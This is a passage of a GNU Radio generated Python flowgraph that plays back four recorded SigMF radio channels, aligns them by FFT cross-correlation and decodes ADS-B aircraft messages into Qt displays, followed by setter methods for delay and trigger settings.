self.fft_vxx_0_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.blocks_throttle_3 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_2 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_1 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate /throttle,True)
self.blocks_throttle_0 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_sub_xx_0_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0 = blocks.sub_ff(1)
self.blocks_stream_to_vector_0_1_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_skiphead_3 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_2 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_1 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_short_to_float_0_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0 = blocks.short_to_float(1, 1)
self.blocks_null_sink_0_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_multiply_const_vxx_1_0_1_0_0_1 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0_0_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_0_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_conjugate_cc_0_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_max_xx_0_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0 = blocks.max_ff(nfft,1)
self.blocks_delay_3_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_3 + int(function_probe_0_3)+manual_fine_delay_3)
self.blocks_delay_3 = blocks.delay(gr.sizeof_gr_complex*1, delay_3)
self.blocks_delay_2_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_2 + int(function_probe_0_2) + manual_fine_delay_2)
self.blocks_delay_2 = blocks.delay(gr.sizeof_gr_complex*1, delay_2)
self.blocks_delay_1_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_1 + int(function_probe_0_1) + manual_fine_delay_1)
self.blocks_delay_1 = blocks.delay(gr.sizeof_gr_complex*1, delay_1)
self.blocks_delay_0_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0 + manual_fine_delay_0)
self.blocks_delay_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0)
self.blocks_complex_to_mag_squared_1_0_0_0_0_2 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_2_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_2 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_0_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_arg_0_0_1 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0_0_0 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0_0 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0 = blocks.complex_to_arg(1)
self.blocks_argmax_xx_0_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0 = blocks.argmax_fs(nfft)
self.blocks_add_xx_0 = blocks.add_vcc(1)
self.blocks_add_const_vxx_0_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0 = blocks.add_const_vff((-nfft / 2, ))
self.analog_const_source_x_0_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_agc2_xx_0_3 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_3.set_max_gain(65536)
self.analog_agc2_xx_0_2 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_2.set_max_gain(65536)
self.analog_agc2_xx_0_1 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_1.set_max_gain(65536)
self.analog_agc2_xx_0 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0.set_max_gain(65536)
self.adsb_framer_1_0_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1 = adsb.framer(samp_rate, thresh)
self.adsb_demod_0_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0 = adsb.demod(samp_rate)
self.adsb_decoder_0_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
##################################################
# Connections
##################################################
self.msg_connect((self.adsb_decoder_0, 'decoded'), (self.pyqt_meta_text_output_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_demod_0, 'demodulated'), (self.adsb_decoder_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0, 'demodulated'), (self.adsb_decoder_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0_0, 'demodulated'))
self.connect((self.adsb_demod_0, 0), (self.qtgui_time_sink_x_0_1_0, 0))
self.connect((self.adsb_demod_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 0))
self.connect((self.adsb_demod_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 0))
self.connect((self.adsb_framer_1, 0), (self.adsb_demod_0, 0))
self.connect((self.adsb_framer_1_0, 0), (self.adsb_demod_0_0, 0))
self.connect((self.adsb_framer_1_0_0, 0), (self.adsb_demod_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0, 0), (self.adsb_demod_0_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0_0, 0), (self.adsb_demod_0_0_0_0_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_freq_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_waterfall_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_complex_to_mag_squared_0_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_freq_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_waterfall_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_complex_to_mag_squared_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_freq_sink_x_0_1, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_waterfall_sink_x_0_0_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_complex_to_mag_squared_0_1_1, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_freq_sink_x_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_waterfall_sink_x_0_0_1, 0))
self.connect((self.analog_const_source_x_0, 0), (self.qtgui_time_sink_x_0_1_0, 1))
self.connect((self.analog_const_source_x_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 1))
self.connect((self.blocks_add_const_vxx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.blocks_add_const_vxx_0_0, 0), (self.blocks_multiply_const_vxx_0_0, 0))
self.connect((self.blocks_add_const_vxx_0_0_0, 0), (self.blocks_multiply_const_vxx_0_0_0, 0))
self.connect((self.blocks_add_xx_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0, 0))
self.connect((self.blocks_add_xx_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 4))
self.connect((self.blocks_argmax_xx_0, 1), (self.blocks_null_sink_0, 0))
self.connect((self.blocks_argmax_xx_0, 0), (self.blocks_short_to_float_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 1), (self.blocks_null_sink_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 0), (self.blocks_short_to_float_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 1), (self.blocks_null_sink_0_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 0), (self.blocks_short_to_float_0_0_0, 0))
self.connect((self.blocks_complex_to_arg_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0, 0))
self.connect((self.blocks_complex_to_arg_0_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0, 0))
self.connect((self.blocks_complex_to_arg_0_0_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0))
self.connect((self.blocks_complex_to_arg_0_0_1, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0))
self.connect((self.blocks_complex_to_mag_0, 0), (self.single_pole_iir_filter_xx_0, 0))
self.connect((self.blocks_complex_to_mag_0_0, 0), (self.single_pole_iir_filter_xx_0_0, 0))
self.connect((self.blocks_complex_to_mag_0_0_0, 0), (self.single_pole_iir_filter_xx_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.qtgui_time_sink_x_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_0, 0), (self.qtgui_time_sink_x_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1, 0), (self.qtgui_time_sink_x_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0, 0), (self.qtgui_time_sink_x_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1, 2))
self.connect((self.blocks_complex_to_mag_squared_0_1_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 2))
self.connect((self.blocks_complex_to_mag_squared_0_1_1, 0), (self.qtgui_time_sink_x_0_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_1_0, 0), (self.qtgui_time_sink_x_0_1, 3))
self.connect((self.blocks_complex_to_mag_squared_0_1_1_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 3))
self.connect((self.blocks_complex_to_mag_squared_0_1_2, 0), (self.qtgui_time_sink_x_0_1, 1))
self.connect((self.blocks_complex_to_mag_squared_0_1_2_0, 0), (self.qtgui_time_sink_x_0_1_1, 1))
self.connect((self.blocks_complex_to_mag_squared_1, 0), (self.adsb_framer_1, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0, 0), (self.adsb_framer_1_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0, 0), (self.adsb_framer_1_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0, 0), (self.adsb_framer_1_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.adsb_framer_1_0_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 4))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0), (self.qtgui_time_sink_x_0_1_1_1, 4))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0), (self.qtgui_time_sink_x_2, 3))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_0_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_add_xx_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_arg_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_mag_squared_0_0_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0))
self.connect((self.blocks_delay_0_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_0_1_2, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_stream_to_vector_0_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_add_xx_0, 1))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_complex_to_arg_0_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_complex_to_mag_squared_0_1_2_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 1))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_0_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_stream_to_vector_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_add_xx_0, 2))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_complex_to_arg_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_complex_to_mag_squared_0_1_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 2))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_0_1_1_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_1_0_0_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_stream_to_vector_0_0_0_0, 0))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_add_xx_0, 3))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_complex_to_arg_0_0_1, 0))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_complex_to_mag_squared_0_1_1_0_0, 0))
self.connect((self.blocks_delay_3_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 3))
self.connect((self.blocks_max_xx_0, 0), (self.qtgui_time_sink_x_1, 0))
self.connect((self.blocks_max_xx_0_0, 0), (self.qtgui_time_sink_x_1, 1))
self.connect((self.blocks_max_xx_0_0_0, 0), (self.qtgui_time_sink_x_1, 2))
self.connect((self.blocks_multiply_conjugate_cc_0, 0), (self.fft_vxx_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0, 0), (self.fft_vxx_0_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0_0, 0), (self.fft_vxx_0_0_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.probe_offset_0_1, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.qtgui_number_sink_0, 0))
self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.probe_offset_0_2, 0))
self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.qtgui_number_sink_0, 1))
self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.probe_offset_0_3, 0))
self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.qtgui_number_sink_0, 2))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0, 0), (self.blocks_sub_xx_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0), (self.blocks_sub_xx_0_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 2))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0), (self.blocks_sub_xx_0_0_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0), (self.qtgui_time_sink_x_0_1_1_1, 3))
self.connect((self.blocks_short_to_float_0, 0), (self.blocks_add_const_vxx_0, 0))
self.connect((self.blocks_short_to_float_0_0, 0), (self.blocks_add_const_vxx_0_0, 0))
self.connect((self.blocks_short_to_float_0_0_0, 0), (self.blocks_add_const_vxx_0_0_0, 0))
self.connect((self.blocks_skiphead_0, 0), (self.blocks_throttle_0, 0))
self.connect((self.blocks_skiphead_1, 0), (self.blocks_throttle_1, 0))
self.connect((self.blocks_skiphead_2, 0), (self.blocks_throttle_2, 0))
self.connect((self.blocks_skiphead_3, 0), (self.blocks_throttle_3, 0))
self.connect((self.blocks_stream_to_vector_0, 0), (self.fft_vxx_0, 0))
self.connect((self.blocks_stream_to_vector_0_0, 0), (self.fft_vxx_1, 0))
self.connect((self.blocks_stream_to_vector_0_0_0, 0), (self.fft_vxx_1_0, 0))
self.connect((self.blocks_stream_to_vector_0_0_0_0, 0), (self.fft_vxx_1_0_0, 0))
self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0_1, 0))
self.connect((self.blocks_stream_to_vector_0_1_0, 0), (self.fft_vxx_0_1_0, 0))
self.connect((self.blocks_sub_xx_0, 0), (self.qtgui_time_sink_x_2, 0))
self.connect((self.blocks_sub_xx_0_0, 0), (self.qtgui_time_sink_x_2, 1))
self.connect((self.blocks_sub_xx_0_0_0, 0), (self.qtgui_time_sink_x_2, 2))
self.connect((self.blocks_throttle_0, 0), (self.analog_agc2_xx_0, 0))
self.connect((self.blocks_throttle_1, 0), (self.analog_agc2_xx_0_1, 0))
self.connect((self.blocks_throttle_2, 0), (self.analog_agc2_xx_0_2, 0))
self.connect((self.blocks_throttle_3, 0), (self.analog_agc2_xx_0_3, 0))
self.connect((self.fft_vxx_0, 0), (self.blocks_multiply_conjugate_cc_0, 0))
self.connect((self.fft_vxx_0_0, 0), (self.blocks_complex_to_mag_0, 0))
self.connect((self.fft_vxx_0_0_0, 0), (self.blocks_complex_to_mag_0_0, 0))
self.connect((self.fft_vxx_0_0_0_0, 0), (self.blocks_complex_to_mag_0_0_0, 0))
self.connect((self.fft_vxx_0_1, 0), (self.blocks_multiply_conjugate_cc_0_0, 0))
self.connect((self.fft_vxx_0_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 0))
self.connect((self.fft_vxx_1, 0), (self.blocks_multiply_conjugate_cc_0, 1))
self.connect((self.fft_vxx_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0, 1))
self.connect((self.fft_vxx_1_0_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 1))
self.connect((self.sigmf_source_0, 0), (self.blocks_skiphead_0, 0))
self.connect((self.sigmf_source_1, 0), (self.blocks_skiphead_1, 0))
self.connect((self.sigmf_source_2, 0), (self.blocks_skiphead_2, 0))
self.connect((self.sigmf_source_3, 0), (self.blocks_skiphead_3, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_argmax_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_max_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.qtgui_vector_sink_f_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_argmax_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_max_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.qtgui_vector_sink_f_0, 1))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_argmax_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_max_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.qtgui_vector_sink_f_0, 2))
    def closeEvent(self, event):
        """Qt close handler: persist the window geometry to QSettings, then accept the close."""
        self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback4")
        self.settings.setValue("geometry", self.saveGeometry())
        event.accept()
    def get_function_probe_0_3(self):
        """Return the current value of the function_probe_0_3 variable."""
        return self.function_probe_0_3

    def set_function_probe_0_3(self, function_probe_0_3):
        """Set function_probe_0_3 and propagate it to dependents.

        Updates the samp_offset_0_3 display (via its formatter) and recomputes
        the total delay of blocks_delay_3_0 (coarse delay + probed offset +
        manual fine delay).
        """
        self.function_probe_0_3 = function_probe_0_3
        self.set_samp_offset_0_3(self._samp_offset_0_3_formatter(self.function_probe_0_3))
        self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)
    def get_function_probe_0_2(self):
        """Return the current value of the function_probe_0_2 variable."""
        return self.function_probe_0_2

    def set_function_probe_0_2(self, function_probe_0_2):
        """Set function_probe_0_2 and propagate it to dependents.

        Updates the samp_offset_0_2 display (via its formatter) and recomputes
        the total delay of blocks_delay_2_0.
        """
        self.function_probe_0_2 = function_probe_0_2
        self.set_samp_offset_0_2(self._samp_offset_0_2_formatter(self.function_probe_0_2))
        self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)
    def get_function_probe_0_1(self):
        """Return the current value of the function_probe_0_1 variable."""
        return self.function_probe_0_1

    def set_function_probe_0_1(self, function_probe_0_1):
        """Set function_probe_0_1 and propagate it to dependents.

        Updates the samp_offset_0_1 display (via its formatter) and recomputes
        the total delay of blocks_delay_1_0.
        """
        self.function_probe_0_1 = function_probe_0_1
        self.set_samp_offset_0_1(self._samp_offset_0_1_formatter(self.function_probe_0_1))
        self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)
    def get_trig_delay(self):
        """Return the current trigger delay value."""
        return self.trig_delay

    def set_trig_delay(self, trig_delay):
        """Set trig_delay: refresh its line-edit text and reapply the
        normal-mode trigger of qtgui_time_sink_x_0_1 with the new delay."""
        self.trig_delay = trig_delay
        Qt.QMetaObject.invokeMethod(self._trig_delay_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.trig_delay)))
        self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
    def get_trig_channel(self):
        """Return the current trigger channel index."""
        return self.trig_channel

    def set_trig_channel(self, trig_channel):
        """Set trig_channel: notify the GUI chooser callback and reapply the
        normal-mode triggers of the three affected time sinks on the new channel."""
        self.trig_channel = trig_channel
        self._trig_channel_callback(self.trig_channel)
        self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_comp, 0.0001, self.trig_channel, "")
        self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, 0.0001, self.trig_channel, "")
